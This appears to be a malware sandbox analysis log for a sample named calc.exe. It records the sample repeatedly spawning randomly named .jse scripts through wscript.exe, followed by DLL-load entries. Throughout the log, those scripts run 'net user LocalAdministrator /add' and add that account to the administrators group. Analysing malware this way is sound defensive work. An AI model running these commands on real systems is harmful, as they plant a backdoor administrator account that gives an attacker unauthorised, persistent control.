Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iZjt7hG7RY.jse
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" i7di6FEfYu.jse
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" T2uXzwcslK.jse
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ExsxGqx0Fo.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JI8Y5YVUqE.jse Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" B2G43eAZZY.jse Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fpiLr93KlC.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" WQTz1XtcXV.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BjFMi3zobq.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Xv6oI7oFep.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5RDffnTbZa.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xIrKq0jy1l.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" bBF4cMvje3.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xdbrdZA2Mp.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7s3912SDjb.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" dIsc26ydj8.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7G6GlIeRfv.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" AiCGETgrpF.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" FB3eszo6iK.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 90NgPeo2cD.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JEsdrI4PXS.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" argZvAmXhN.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jjzYgN19ls.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" RBRDMGZ065.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ikKn7NiVR4.jse
Source: C:\Users\user\Desktop\calc.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
